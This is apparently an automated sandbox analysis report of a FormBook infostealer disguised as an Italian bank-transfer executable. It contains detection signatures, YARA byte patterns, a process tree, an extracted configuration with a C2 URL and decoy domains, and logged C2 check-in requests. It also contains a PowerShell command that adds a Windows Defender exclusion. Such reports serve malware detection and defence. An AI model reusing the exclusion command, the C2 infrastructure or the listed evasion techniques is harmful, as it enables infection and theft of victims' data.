Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe

Overview

General Information

Sample name:Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
Analysis ID:1460774
MD5:6b799c2e76b37bf96ef35ba8580f0bfc
SHA1:b710a5aa6385f9424c37c944ef27d10ef99df97f
SHA256:e10280c91dc1fb46756d9473163eec9052b8c8a352955d0f21a24246da054ba2
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: 6B799C2E76B37BF96EF35BA8580F0BFC)
    • powershell.exe (PID: 7792 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: 6B799C2E76B37BF96EF35BA8580F0BFC)
      • explorer.exe (PID: 2592 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 7984 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 8024 cmdline: /c del "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jnhdh8827.com/pz12/"], "decoy": ["paucanyes.com", "autonwheels.com", "cowboysandcaviarbar.com", "fitnessengineeredworkouts.com", "nuevobajonfavorito.com", "dflx8.com", "rothability.com", "sxybet88.com", "onesource.live", "brenjitu1904.com", "airdrop-zero1labs.com", "guangdongqiangzhetc.com", "apartments-for-rent-72254.bond", "ombak99.lol", "qqfoodsolutions.com", "kyyzz.com", "thepicklematch.com", "ainth.com", "missorris.com", "gabbygomez.com", "aromacuppa.com", "kaskusbagus.com", "zoox1.asia", "hemophilia-treatment-41433.bond", "meidupro.com", "shrisona.com", "sekanse.com", "marcocostasax.com", "loyalbahis356.com", "mzmz97.com", "ma-google.com", "xiangadvanced.site", "tuotalogis.com", "xcxocef.shop", "fidgetbottles.com", "shuaninvolved.site", "ambientelatino.com", "98980901.com", "singhbrothersframes.com", "pureamyl.com", "hgs0713.net", "surejobzapp.com", "slotgame99.bet", "datalakeflow.com", "ebehemin.com", "vanessasmobilespa.com", "317wb.com", "motchillssss.top", "huesch.net", "salesgymshark.shop", "mejorcompra99.com", "tacubashop.com", "jessicaxsimmons.com", "roar-stores.com", "chalkandthimble.com", "84556.vip", "luyutuwen.com", "siliconcollege.icu", "marvowhite.com", "gjxuh82y0u3h6.top", "e2taop5.top", "businessbroadway.com", "cripmz.xyz", "4hu259.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 5 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ParentImage: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ParentProcessId: 7532, ParentProcessName: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ProcessId: 7792, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ParentImage: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ParentProcessId: 7532, ParentProcessName: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ProcessId: 7792, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ParentImage: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ParentProcessId: 7532, ParentProcessName: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe", ProcessId: 7792, ProcessName: powershell.exe

          Snort Signatures

          Timestamp:06/21/24-16:14:50.292769
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:17:32.715564
          SID:2031412
          Source Port:64867
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:16:30.997720
          SID:2031412
          Source Port:64864
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:17:12.110813
          SID:2031412
          Source Port:64866
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:18:16.654776
          SID:2031412
          Source Port:64868
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:15:50.125620
          SID:2031412
          Source Port:64862
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:16:51.501355
          SID:2031412
          Source Port:64865
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:16:10.912575
          SID:2031412
          Source Port:64863
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/21/24-16:15:29.832153
          SID:2031412
          Source Port:64861
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.motchillssss.topAvira URL Cloud: Label: malware
          Source: http://www.motchillssss.top/pz12/Avira URL Cloud: Label: malware
          Source: http://www.motchillssss.top/pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLuAvira URL Cloud: Label: malware
          Source: http://www.loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLuAvira URL Cloud: Label: malware
          Source: http://www.ebehemin.com/pz12/Avira URL Cloud: Label: malware
          Source: https://login.microsoftonline.coAvira URL Cloud: Label: phishing
          Source: http://www.loyalbahis356.comAvira URL Cloud: Label: malware
          Source: http://www.ebehemin.comAvira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jnhdh8827.com/pz12/"], "decoy": ["paucanyes.com", "autonwheels.com", "cowboysandcaviarbar.com", "fitnessengineeredworkouts.com", "nuevobajonfavorito.com", "dflx8.com", "rothability.com", "sxybet88.com", "onesource.live", "brenjitu1904.com", "airdrop-zero1labs.com", "guangdongqiangzhetc.com", "apartments-for-rent-72254.bond", "ombak99.lol", "qqfoodsolutions.com", "kyyzz.com", "thepicklematch.com", "ainth.com", "missorris.com", "gabbygomez.com", "aromacuppa.com", "kaskusbagus.com", "zoox1.asia", "hemophilia-treatment-41433.bond", "meidupro.com", "shrisona.com", "sekanse.com", "marcocostasax.com", "loyalbahis356.com", "mzmz97.com", "ma-google.com", "xiangadvanced.site", "tuotalogis.com", "xcxocef.shop", "fidgetbottles.com", "shuaninvolved.site", "ambientelatino.com", "98980901.com", "singhbrothersframes.com", "pureamyl.com", "hgs0713.net", "surejobzapp.com", "slotgame99.bet", "datalakeflow.com", "ebehemin.com", "vanessasmobilespa.com", "317wb.com", "motchillssss.top", "huesch.net", "salesgymshark.shop", "mejorcompra99.com", "tacubashop.com", "jessicaxsimmons.com", "roar-stores.com", "chalkandthimble.com", "84556.vip", "luyutuwen.com", "siliconcollege.icu", "marvowhite.com", "gjxuh82y0u3h6.top", "e2taop5.top", "businessbroadway.com", "cripmz.xyz", "4hu259.com"]}
          Multi AV Scanner detection for submitted file
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeReversingLabs: Detection: 78%
          Yara detected FormBook
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3766029603.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.3765947649.0000000002BC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeJoe Sandbox ML: detected
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: control.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000003.1421198308.00000000043EE000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.1423117793.000000000459B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1423184745.0000000002CB0000.00000040.10000000.00040000.00000000.sdmp, Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe, 00000006.00000002.1421108416.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.3765131140.0000000000220000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: BIze.pdbSHA256 source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: Binary string: BIze.pdb source: Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 4x nop then jmp 073B7288h0_2_073B69D3
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 4x nop then pop ebx6_2_00407B1B
          Source: C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeCode function: 4x nop then pop edi6_2_00416CEB
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop ebx8_2_02537B1B
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi8_2_02546CEB

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:49716 -> 188.114.96.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64861 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64862 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64863 -> 172.67.158.16:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64864 -> 185.53.179.92:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64865 -> 103.169.142.0:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64866 -> 192.64.118.107:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64867 -> 188.114.96.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.11:64868 -> 107.158.172.173:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.jnhdh8827.com/pz12/
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHU/iA/QpxM3q&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.jnhdh8827.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.loyalbahis356.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.sxybet88.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.ainth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.motchillssss.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.hemophilia-treatment-41433.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.paucanyes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.ombak99.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.shuaninvolved.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 185.53.179.92 185.53.179.92
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 7_2_0C611F82 getaddrinfo,setsockopt,recv,7_2_0C611F82
          Source: global trafficHTTP traffic detected: GET /pz12/?Ft6LPF=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHU/iA/QpxM3q&Ev2=OjrLPv0Hh4WLu HTTP/1.1Host: www.jnhdh8827.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
